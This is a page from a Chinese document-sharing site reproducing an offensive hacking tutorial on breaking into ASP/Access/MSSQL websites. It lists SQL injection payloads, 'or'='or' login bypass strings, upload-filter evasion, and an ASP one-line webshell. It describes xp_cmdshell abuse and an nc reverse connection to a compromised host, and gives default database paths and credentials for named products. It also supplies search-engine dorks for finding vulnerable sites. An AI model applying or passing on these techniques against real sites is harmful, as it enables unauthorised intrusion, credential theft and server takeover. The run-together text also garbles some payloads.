您好,欢迎访问三七文档
当前位置:首页 > 商业/管理/HR > 销售管理 > 入侵网站服务器的方法
入侵网站服务器的8种方法1、SQL注入漏洞的入侵这种是里面ASP+ACCESS的网站入侵方式,通过注入点列出数据库管理员的帐号和密码信息,然后猜解出网站的后台地址,然后用帐号和密码登录进去找到文件上传的地方,把ASP木马上传上去,获得一个网站的WEBSHELL。2、ASP上传漏洞的利用这种技术方式是利用一些网站的ASP上传功能来上传ASP木马的一种入侵方式,不少网站都限制了上传文件的类型,一般来说ASP为后缀的文件都不允许上传,但是这种限制是可以被黑客突破的,黑客可以采取COOKIE欺骗的方式来上传ASP木马,获得网站的WEBSHELL权限。3、后台数据库备份方式获得WEBSHELL这个主要是利用网站后台对ACCESS数据库进行数据库备份和恢复的功能,备份数据库路径等变量没有过滤导致可以把任何文件的后缀改成ASP,那么利用网站上传的功能上传一个文件名改成JPG或者GIF后缀的ASP木马,然后用这个恢复库备份和恢复的功能把这个木马恢复成ASP文件,从而达到能够获取网站WEBSHELL控制权限的目的。4、网站旁注入侵这种技术是通过IP绑定域名查询的功能查出服务器上有多少网站,然后通过一些薄弱的网站实施入侵,拿到权限之后转而控制服务器的其它网站。5、sa注入点利用的入侵技术这种是ASP+MSSQL网站的入侵方式,找到有SA权限的SQL注入点,然后用SQL数据库的XP_CMDSHELL的存储扩展来运行系统命令建立系统级别的帐号,然后通过3389登录进去,或者在一台肉鸡上用NC开设一个监听端口,然后用VBS一句话木马下载一个NC到服务器里面,接着运行NC的反向连接命令,让服务器反向连接到远程肉鸡上,这样远程肉鸡就有了一个远程的系统管理员级别的控制权限。6、sa弱密码的入侵技术这种方式是用扫描器探测SQL的帐号和密码信息的方式拿到SA的密码,然后用SQLEXEC之类的工具通过1433端口连接到远程服务器上,然后开设系统帐号,通过3389登录。然后这种入侵方式还可以配合WEBSHELL来使用,一般的ASP+MSSQL网站通常会把MSSQL的连接密码写到一个配置文件当中,这个可以用WEBSHELL来读取配置文件里面的SA密码,然后可以上传一个SQL木马的方式来获取系统的控制权限。7、提交一句话木马的入侵方式这种技术方式是对一些数据库地址被改成asp文件的网站来实施入侵的。黑客通过网站的留言版,论坛系统等功能提交一句话木马到数据库里面,然后在木马客户端里面输入这个网站的数据库地址并提交,就可以把一个ASP木马写入到网站里面,获取网站的WEBSHELL权限。8、论坛漏洞利用入侵方式这种技术是利用一些论坛存在的安全漏洞来上传ASP木马获得WEBSHELL权限,最典型的就是,动网6.0版本,7.0版本都存在安全漏洞,拿7.0版本来说,注册一个正常的用户,然后用抓包工具抓取用户提交一个ASP文件的COOKIE,然后用明小子之类的软件采取COOKIE欺骗的上传方式就可以上传一个ASP木马,获得网站的WEBSHELL。2入侵网站的14种可利用方法1.上传漏洞upfile.asp,upload.asp,upload_flash.asp,upfile_soft.asp,upfile_softpic.asppS:如果看到:选择你要上传的文件[重新上传]或者出现“请登陆后使用”,80%就有漏洞了!有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传。还有一些只是检测文件类型的,没有进行后缀名判断,这样的上传只需要把木马文件的开关加个GIF89a就可以通过了。而且可以上传任意文件,在asp和asp.net测试中都可以上传。2.注入漏洞pS:对MD5密码.有时我们不是哪么容易跑出来.如果是[SQL数据库].那么我们可以用以下命令:http://注入网址;updateadminsetpassword=’新MD5密码’wherepassword=’旧MD5密码’--[admin为表名.]//看看是什么权限的,如果权限高的话,直接用SQLTOOLS进行连接就可以执行系统命令了。http://注入网址and1=(SelectIS_MEMBER(''db_owner''))http://注入网址Andchar(124)%2BCast(IS_MEMBER(''db_owner'')asvarchar(1))%2Bchar(124)=1;--//检测是否有读取某数据库的权限http://注入网址and1=(SelectHAS_DBACCESS(''master''))http://注入网址Andchar(124)%2BCast(HAS_DBACCESS(''master'')asvarchar(1))%2Bchar(124)=1--3.旁注,也就是跨站我们入侵某站时可能这个站坚固的无懈可击,我们可以找下和这个站同一服务器的站点,然后在利用这个站点用提权,嗅探等方法来入侵我们要入侵的站点。在这里有个难点,就是一些服务器的绝对路径经过加密,这就看我们的本事了。4.暴库:把二级目录中间的/换成%5ceg:=职责范围&BigClassType=1换成这样的形式提交:=职责范围&BigClassType=1如果你能看到:’E:/ahttc040901/otherweb/dz/database/iXuEr_Studio.asa’不是一个有效的路径。确定路径名称拼写是否正确,以及是否连接到文件存放的服务器。这样的就是数据库了。下载时用FLASHGET换成.MDB格式的就行.5.绕过密码验证直接进入后台’or’=’or’这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有:’or’’=’ora=a’)or(’a’=’a)or(a=aor1=1--''or’a’=’a6.社会工程学这个我们都知道吧。就是猜解。猜解一些人们常用的密码,比如他的生日啊,手机号码啊。办公电话啊等等。。EY:7.写入ASP格式数据库就是一句话木马[〈%executerequest(value)%〉],常用在留言本.EY:[这个就是ASP格式的数据库],再写入一句话木马,然后利用ASP后缀名的数据库进行写入木马。也提醒一下站长,MDB数据库改为.asp后缀也是不安全的。8.源码利用很多网站用的都是网上下载的源码,有的站长很懒,什么也不改。然后就上传开通网站了,像这样的网站只要知道他用的什么网站的源码做的,自己去网上下载一个,然后就有很多信息可以利用了。像数据库备份,网站后台啊,原始数据库路径啊,上传文件的路径啊等等,都可以进行利用。EY:这个站用的是:杰出校友录,源码我下过了,默认数据库/webshell路径:/database/liangu_data.mdb后台管理:adm_login.asp密码及用户名都是admin9.默认数据库/webshell路径利用这样的网站很多/利人别人的WEBSHELL./Databackup/dvbbs7.MDB/bbs/Databackup/dvbbs7.MDB/bbs/Data/dvbbs7.MDB/data/dvbbs7.mdb/bbs/diy.asp/diy.asp/bbs/cmd.asp/bbs/cmd.exe/bbs/s-u.exe/bbs/servu.exe工具:网站猎手挖掘鸡EY:查看目录法,有一些网站可以浏览目录,可以看到目录下所有的文件。EY:://这样我们可以找到数据库,下载不用我教吧11.工具溢出.asp?NewsID=/2j.asp?id=18.asp?id=[这种方法可以取得大量的WEBSHELL]12.搜索引擎利用(1).inurl:flasher_list.asp默认数据库:database/flash.mdb后台/manager/(2).找网站的管理后台地址:site:xxxx.comintext:管理site:xxxx.comintitle:管理〈关键字很多,自已找〉site:xxxx.cominurl:login(3).查找access的数据库,mssql、mysql的连接文件allinurl:bbsdatafiletype:mdbinurl:databasefiletype:incconninurl:datafiletype:mdb13.COOKIE诈骗把自己的ID修改成管理员的,MD5密码也修改成他的,用桂林老兵工具可以修改COOKIE。然后就直接登录有了网站后台管理员权限了。这个我就不多讲了14.利用常见的漏洞,如动网BBSEY:可以先用:dvbbs权限提升工具,使自已成为前台管理员。THEN,运用:动网固顶贴工具,找个固顶贴,再取得COOKIES,这个要你自已做。我们可以用WSockExpert取得Cookies/NC包3拿到webshell权限的45种方法1,到GoogLe,搜索一些关键字,edit.asp?韩国肉鸡为多,多数为MSSQL数据库!2,到Google,site:cq.cninurl:asp3,利用挖掘鸡和一个ASP木马.文件名是login.asp路径组是/manage/关键词是went.asp用'or'='or'来登陆4,关键字:CoNetMIBVer1.0网站后台管理系统帐号密码为'or'='or'5.动感购物系统inurl:help.asp登陆,如未注册成为会员!upLoad_bm1.asp和upLoad_c1.asp这两个随便选个,一般管理员都忽视了这2漏洞6。默认数据库地址blogdata/acblog.asa关键字:acblog7.百度/htdocs注册里可以直接上传asa文件!8./Database/#newasp.mdb关键词:NewAspSiteManageSystemVersion9.用挖掘机关键字:PoweredbyWEBBOY页面:/upfile.asp10.baidu中搜索关键字Ver5.0Build0519(存在上传漏洞)11.Upfile_Article.aspbbs/upfile.asp输入关键字:poweredbymypower,12.inurl:winnt\system32\inetsrv\在google里面输入这个就可以找到很多网站13.现在GOOGLE搜索关键字intitle:网站小助手inurl:asp14.键字:首页最新动态新手指南舞曲音乐下载中心经典文章玩家风采装备购买站内流言友情连接本站论坛挖掘鸡的关键字添setup.asp15.VBulletin论坛的数据库默认数据库地址!/includes/functions.php工具:1.网站猎手下载地址:百度Google!2.Google关键字:Poweredby:vBulletinVersion3.0.1Poweredby:vBulletinVersion3.0.2Poweredby:vBulletinVersion3.0.3其中一个就可
本文标题:入侵网站服务器的方法
链接地址:https://www.777doc.com/doc-2683791 .html